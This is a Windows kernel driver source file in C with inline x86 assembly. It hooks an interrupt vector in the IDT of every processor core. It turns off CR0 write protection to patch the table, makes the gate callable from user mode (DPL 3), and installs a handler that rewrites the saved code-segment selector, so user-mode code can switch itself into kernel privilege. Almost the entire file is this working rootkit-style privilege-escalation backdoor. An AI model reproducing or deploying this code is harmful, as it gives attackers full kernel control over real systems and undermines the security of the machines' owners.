
#include "hook.h"
#include "nt_internals.h"
#include "constants.h"

//Maximum number of processor we can handle
#define MAX_PROCESSORS 8


//IDT Definition
IDTENTRY* pIDT;


//Interrupt handlers
u_int32 new_int_handler[MAX_PROCESSORS], old_int_handler[MAX_PROCESSORS], new_int_handler2[MAX_PROCESSORS];
u_int8 new_DPLs[MAX_PROCESSORS], old_DPLs[MAX_PROCESSORS], old_DPLs2[MAX_PROCESSORS];


/**
 * Setup the IDT hook
 */
void Hook()
{
	int i;
	
    //Prepare IDT hooking
    for(i = 0; i  < KeNumberProcessors; i++)
    {
        new_int_handler[i] = (u_int32) interrupt_handler;
		new_DPLs[i] = 3;
    }

    //Hook Page fault handler
    HookAllIDTs(INT_VECT_TO_HOOK, old_int_handler, new_int_handler, new_DPLs, old_DPLs);
	
	DbgPrint("IDT[%d] hooked.\n", INT_VECT_TO_HOOK);
    
}

/**
 * Unhook
 */
void UnHook()
{
    //Unhook all IDTs
    HookAllIDTs(INT_VECT_TO_HOOK, new_int_handler2, old_int_handler, old_DPLs, old_DPLs2);
	
	DbgPrint("IDT[%d] unhooked.\n", INT_VECT_TO_HOOK);
    
}


/**
 * Hook all the IDTs (one per core)
 */
void HookAllIDTs(u_int32 interrupt_number, u_int32* old_addresses, u_int32* new_addresses, u_int8* new_DPLs, u_int8* old_DPLs)
{

    KPCR* pKPCR = (KPCR*) KPCR_ADDRESS;
    u_int32 PrcbOffset = (ULONG)pKPCR->Prcb - (ULONG)pKPCR;
    int index_pb = 0;
    PDBGKD_GET_VERSION64 pKdVersion64;
    PKDDEBUGGER_DATA64 pKdData64;
    _KiPB* pKiPB;

    //The SIDT instruction doesn't work well in Virtual Box so we use the KPCR structure to get the IDT address
    pKdVersion64 = (PDBGKD_GET_VERSION64)pKPCR->KdVersionBlock; 
    pKdData64 = (PKDDEBUGGER_DATA64)* ((PULONG)(LOW_DWORD(pKdVersion64->DebuggerDataList))); 
    pKiPB = (_KiPB*) (LOW_DWORD(pKdData64->KiProcessorBlock));
    pKiPB = (_KiPB*) (LOW_DWORD(pKdData64->KiProcessorBlock));

    //For all processors, hook IDT
    do
    {
        pKPCR = (KPCR*) ((ULONG)pKiPB[index_pb]- PrcbOffset);
        
        //Hook this IDT
        HookOneIDT((IDTENTRY*) pKPCR->IDT, interrupt_number, &old_addresses[index_pb], new_addresses[index_pb], new_DPLs[index_pb], &old_DPLs[index_pb]);
        
        index_pb++;
    } while (pKiPB[index_pb]!= 0); 

}



/**
 * Hook an interrupt handler
 */
void HookOneIDT(IDTENTRY* pIDT, u_int32 interrupt_number, u_int32* old_address, u_int32 new_address, u_int8 new_DPL, u_int8* old_DPL)
{
    u_int32 new_int_address;
    u_int32 old_cr0;
    u_int32 new_cr0;

    _asm
    {
        cli
        push eax
        mov  eax, CR0
        mov old_cr0, eax
        and  eax, 0FFFEFFFFh
        mov  CR0, eax
        pop  eax
    }

    *old_address = ((pIDT[interrupt_number].hi_offset << 16) | (pIDT[interrupt_number].low_offset));
    pIDT[interrupt_number].hi_offset = (new_address >> 16) & 0xFFFF;
    pIDT[interrupt_number].low_offset = (new_address & 0xFFFF);
	
	*old_DPL = pIDT[interrupt_number].DPL;
	pIDT[interrupt_number].DPL = new_DPL;
	
    _asm
    {
        push eax
        mov  eax, CR0
        mov  new_cr0, eax
        or   eax, NOT 0FFFEFFFFh
        mov  CR0, eax
        pop  eax
        sti
    }
}


/**
 * New page fault handler
 */
_declspec(naked) void interrupt_handler(){
    _asm {
		//Test the old CS value(CS at [esp+4])
		cmp dword ptr [esp+4], CS_KERNELLAND
		je GoRing3

//GoRing0:
		//Userland -> Kernelland
		//Set old CS = CS_KERNELLAND
		mov dword ptr [esp+4], CS_KERNELLAND
		jmp RetHandler

GoRing3:
		//Kernelland -> Userland
		//Set old CS = CS_USERLAND
		mov dword ptr [esp+4], CS_USERLAND
		
RetHandler:
		//Return from interrupt
		iretd
	}
}


